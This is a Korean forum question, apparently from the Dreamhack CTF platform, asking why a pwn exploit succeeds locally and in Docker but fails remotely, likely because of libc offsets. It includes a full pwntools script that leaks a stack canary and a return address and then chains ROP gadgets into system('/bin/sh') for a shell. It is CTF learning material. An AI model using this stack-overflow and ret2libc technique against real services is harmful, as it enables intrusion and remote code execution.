문제 파일에서 제공된 Docker환경에서 익스플로잇은 잘 됩니다 일단 카나리 릭은 잘 되는 것 같은데 라이브러리가 도커랑 다른걸까요.. 아래는 도커에서 이것저것 확인해본 것들입니다. 맨 밑에 코드 첨부되어있어요 image.png image.png image.png from pwn import * def enc(data): data = bytearray(data) # 변경 가능한 형태로 변환 for i in range(1, len(data)): data[i - 1] ^= data[i] return bytes(data) def dec(data): data = bytearray(data) # 변경 가능한 형태로 변환 for i in range(len(data) - 1, 0, -1): # 역순으로 연산 data[i - 1] ^= data[i] return bytes(data) p = remote('localhost',8080) p = remote('host3.dreamhack.games', 16230) cnry 획득 payload = b'' for i in range(1,0x1a,1): payload += chr(i).encode() p.sendafter("Input: ",payload) p.recvuntil(': ') p.recvn(0x19) cnry = b'\x00'+p.recvn(7) ret_addr 로 libc_base 획득 payload = b'' for i in range(1,0x29,1): payload += chr(i).encode() p.sendafter('Input: ', payload) p.recvuntil(': ') p.recvn(0x28) ret_addr = u64(p.recvn(0x6)+b'\x00\x00') ret_addr = __libc_start_call_main+128 __libc_start_main은 call_main+0xb0 lib의 start_main은 0x29dc0 lib 베이스 주소는 ret_addr-128+0xb0-0x29dc0 libc_base = ret_addr-128+0xb0-0x29dc0 system = 0x50d70 + libc_base binsh = 0x1d8678 + libc_base pop_rdi = 0x2a3e5 + libc_base ret = 0x29139 + libc_base payload = dec(b'exit\x00'.ljust(0x18,b'\x00') + cnry + b'12345678' + p64(pop_rdi) + p64(binsh) + p64(ret) + p64(system)) p.sendafter(": ",payload) p.recvuntil(': ') p.interactive() `

따로 주어진 libc가 없어서 로컬에 있는 libc로 system이랑 /bin/sh 주소, 가젯 주소들까지 구해서 익스를 해봤는데 로컬에서만 되고 리모트하니까 안됩니다.... ㅠㅜ 아마 libc offset이 달라서 그런거 같은데,, 어떻게 해야할까요 조언 부탁드립니다 ㅠㅡㅜ